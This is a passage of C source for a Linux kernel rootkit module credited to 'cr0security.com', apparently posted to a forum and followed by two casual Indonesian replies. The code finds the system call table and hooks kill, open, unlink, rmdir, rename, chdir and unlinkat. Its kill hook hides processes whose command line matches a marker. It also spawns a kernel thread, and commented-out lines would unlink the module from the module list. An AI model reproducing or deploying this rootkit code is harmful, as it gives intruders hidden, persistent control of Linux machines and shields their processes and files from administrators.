file_buf = kmalloc(200,GFP_KERNEL);
lemme_lemme_maho = kmalloc(totheap,GFP_KERNEL);
sprintf(lemme_lemme_maho,"/proc/%s/cmdline",hasil_konversi);
KERN
ev1l_proc = filp_open(lemme_lemme_maho,O_RDONLY,0);
END
if (IS_ERR(ev1l_proc))
goto closeme;
else {
KERN
ev1l_proc->f_op->read(ev1l_proc, file_buf,50, &ev1l_proc->f_pos);
END
if (strstr(file_buf,cr_PROC))
return (unsigned long *) (-ESRCH);
else
return (unsigned long *) (*kill_asli)(pid,sig);
}
closeme:
filp_close(ev1l_proc,NULL);
kfree(file_buf);
kfree(lemme_lemme_maho);
}
return (unsigned long *) (*kill_asli)(pid,sig);
}

/*init module for cr0security*/
static cr0 cr0security cr_start(void)
{
printk("\nlet met start\n");
//list_del (&THIS_MODULE->list);
//try_module_get(THIS_MODULE);
cr();
/*unsigned long *proto_sys_call = (unsigned long *) 0xc05d2180;*/
KERN
if (proto_sys_call == invalid) {
proto_sys_call = (void *) *find_sys_call_table();
}
END

#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
unlinkat_asli=(void *) (proto_sys_call[__NR_unlinkat]);
#endif
kill_asli = (void *) (proto_sys_call[__NR_kill]);
write_asli = (void *) (proto_sys_call[__NR_write]);
open_asli = (void *) (proto_sys_call[__NR_open]);
unlink_asli = (void *) (proto_sys_call[__NR_unlink]);
rename_asli = (void *) (proto_sys_call[__NR_rename]);
rmdir_asli = (void *) (proto_sys_call[__NR_rmdir]);
chdir_asli= (void *) (proto_sys_call[__NR_chdir]);
proto_sys_call[__NR_kill] = (unsigned long) *(cr_kill);
proto_sys_call[__NR_open] = (unsigned long) *(cr_open);
proto_sys_call[__NR_unlink] = (unsigned long) *(cr_unlink);
proto_sys_call[__NR_rmdir] = (unsigned long) *(cr_rmdir);
proto_sys_call[__NR_rename] = (unsigned long) *(cr_rename);
proto_sys_call[__NR_chdir] = (unsigned long) *(cr_chdir);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
proto_sys_call[__NR_unlinkat] = (unsigned long) *(cr_unlinkat);
#endif
//proto_sys_call[__NR_write] = (unsigned long) *(cr_write);
cr();
KERN
kernel_thread(init_cr_this_mod,NULL,0);
//tcpd_thread=kthread_run(init_cr_this_mod,NULL,"init cr0 tcpd");
END
return 0;
}

/*eof init module for cr0security*/
static void cr0security cr_end(void)
{
printk("\nlet me end\n");
cr();
proto_sys_call[__NR_rmdir] = (unsigned long) *(rmdir_asli);
proto_sys_call[__NR_rename] = (unsigned long) *(rename_asli);
proto_sys_call[__NR_kill] = (unsigned long) *(kill_asli);
//proto_sys_call[__NR_write] = (unsigned long) *(write_asli);
proto_sys_call[__NR_open] = (unsigned long) *(open_asli);
proto_sys_call[__NR_unlink] = (unsigned long) *(unlink_asli);
proto_sys_call[__NR_chdir] = (unsigned long) *(chdir_asli);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
proto_sys_call[__NR_unlinkat] = (unsigned long) *(unlinkat_asli);
#endif
cr();
//kthread_stop(tcpd_thread);
}

module_init(cr_start);
module_exit(cr_end);
MODULE_AUTHOR("cr0security.com");
MODULE_LICENSE("GPL");
===================

[Bunga.Mataharry]

Nyantai bro, pacaran aja dulu....

[wendyaja]

waw keren nie bau baunya om wisdom nie